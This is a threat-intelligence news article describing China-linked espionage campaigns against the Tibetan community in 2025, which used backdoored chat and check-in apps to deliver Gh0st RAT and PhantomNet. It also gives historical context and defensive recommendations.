In a series of sophisticated cyber espionage campaigns, China-linked Advanced Persistent Threats (APTs) have intensified their efforts to infiltrate the Tibetan community. These operations, identified as Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz, were strategically executed in June 2025, coinciding with the Dalai Lama’s 90th birthday on July 6, 2025.
Operation GhostChat:
The attackers compromised a legitimate website, replacing a link that originally directed users to tibetfund[.]org/90thbirthday with a fraudulent version hosted at thedalailama90.niccenter[.]net. The authentic page was intended for sending messages to the Dalai Lama. In contrast, the counterfeit page introduced an option to send encrypted messages by downloading a so-called secure chat application named TElement, purportedly a Tibetan version of the open-source encrypted chat software Element.
However, this version of TElement was backdoored, containing a malicious Dynamic Link Library (DLL) that, when executed, sideloaded Gh0st RAT—a remote access trojan extensively utilized by various Chinese hacking groups. Additionally, the fraudulent webpage embedded JavaScript code designed to collect visitors’ IP addresses and user-agent information, subsequently exfiltrating these details to the threat actors via an HTTP POST request.
Operation PhantomPrayers:
In this campaign, the attackers employed another deceptive domain, hhthedalailama90.niccenter[.]net, to distribute a counterfeit application named 90th Birthday Global Check-in (DalaiLamaCheckin.exe). Upon execution, the application displayed an interactive map, prompting users to send your blessings to the Dalai Lama by selecting their location.
Unbeknownst to the users, the application utilized DLL side-loading techniques to deploy PhantomNet (also known as SManager), a backdoor that established communication with a command-and-control (C2) server over TCP. This connection enabled the download and execution of additional plugin DLLs on the compromised system. Notably, PhantomNet is capable of operating during specific hours or days, although this feature was not activated in the observed sample. The backdoor’s modular design, AES-encrypted C2 traffic, and configurable timed operations allowed for stealthy management of the infected systems.
Historical Context:
These incidents are not isolated. Chinese threat actors have a documented history of targeting the Tibetan community through various cyber espionage tactics. Notably, in 2009, the GhostNet operation infiltrated numerous computers across 103 countries, including those belonging to embassies, foreign ministries, and organizations affiliated with the Dalai Lama. The operation utilized emails containing malicious attachments to install trojans, granting attackers real-time control over infected systems. Similarly, the Shadow Network, uncovered in 2010, stole classified documents and emails from the Indian government and the Dalai Lama’s office, leveraging internet services like social networking and cloud platforms to host malware.
In 2013, the Chinese-language website of the Central Tibetan Administration (CTA) was hacked and infected with viruses, potentially enabling surveillance of visitors. Security experts noted that the CTA website had been under constant attack since 2011, with hackers employing watering-hole attacks to exploit vulnerabilities and gain unauthorized access to users’ systems.
Implications and Recommendations:
The recurrence of such targeted cyber attacks underscores the persistent threat faced by the Tibetan community from state-sponsored actors. These operations not only aim to gather sensitive information but also to monitor and potentially disrupt the activities of Tibetan organizations and individuals.
To mitigate these threats, it is imperative for individuals and organizations within the Tibetan community to:
– Exercise Caution with Digital Communications: Be vigilant when receiving unsolicited emails or messages, especially those containing links or attachments.
– Verify Authenticity of Applications: Only download software from official and trusted sources. Be wary of applications claiming to offer secure communication without proper verification.
– Implement Robust Security Measures: Regularly update software and operating systems to patch vulnerabilities. Utilize reputable antivirus and anti-malware solutions.
– Educate and Train Personnel: Conduct regular cybersecurity awareness training to recognize phishing attempts and other common attack vectors.
By adopting these practices, the Tibetan community can enhance its resilience against cyber espionage activities and safeguard its sensitive information from malicious actors.
